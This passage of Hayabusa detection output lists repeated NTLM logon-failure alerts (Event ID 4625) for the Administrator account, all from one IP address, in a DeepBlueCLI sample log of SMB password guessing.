+2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: 
